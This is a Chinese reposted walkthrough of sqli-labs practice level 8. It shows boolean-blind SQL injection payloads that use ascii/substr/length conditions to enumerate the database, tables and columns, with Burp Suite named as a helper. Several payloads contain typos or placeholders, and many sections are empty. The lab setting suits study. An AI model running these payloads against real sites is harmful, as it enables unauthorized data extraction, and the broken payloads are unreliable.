sqli_labs靶场——第8-22关
脚本宝典收集整理的这篇文章主要介绍了sqli_labs靶场——第8-22关,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
第8关
手工
注入点
- 单引号 输入单引号页面不能正常显示 2.构造正确逻辑 页面正常显示 3.错误逻辑 页面什么不显示 补充:根据页面显示,本关可以用布尔盲注和时间注入;选择用布尔盲注,因为9-10是可以练习事件注入的
数据库长度
数据库
利用Burpsuite,帮助我们加快测试的流程
语句
- ' and ascii(substr(database(),1,1))=97--+
使用bp
数据表
确定当前库中有几张表
命令
1' and (select count(table_name) from inforrmation_schema.tables where table_schema=database())=1--+
使用bp
确定第x张表的长度
命令
1' and length((select table_name from information_schema.tables where table_schema=database() limit 3,1))=5--+
确定表名
1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)=a--+ 1' and asci(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=97--+
使用bp
我麻木了,不想进行此步操作了
列
确定有几列
1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=1--+
确定第x列的长度
1' and lenth((选择列的命令 limit 0,1))=3--+
确定第x列的名字
1' and abstr((选择列的命令 limit 0,1),1,1)='a'--+ 1' and ascii(abstr((选择列的命令 limit 0,1),1,1))=97--+
具体数值
获取字段有多少行数据
获取每行数据的长度
获取每行的具体内容
工具
获取当前数据库
获取表名
获取列名
获取数值
总结
脚本宝典总结
以上是脚本宝典为你收集整理的sqli_labs靶场——第8-22关全部内容,希望文章能够帮你解决sqli_labs靶场——第8-22关所遇到的问题。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。
- clion结合vcpkg以及GTest的使用 2022-07-07
- EGF 2022-06-06
- ExtJS 布局-Column布局(Column layout) 2022-06-05
- 颜色之ARGB与RGB、RGBA的区别与介绍 2022-04-15
- rgba中的a是什么意思 CSS之RGBA颜色指南 2022-04-15
- rootfs -根文件系统制作 2022-07-07
- 网页简单布局之结构与表现原则分享 2022-04-15
- 小项目中怎么防止Vue的闪现画面效果 2022-04-15
- 隐藏 Web 中的元素方法及优缺点教程详解 2022-04-15
- 告别硬编码让你的前端表格自动计算的实例代码 2022-04-15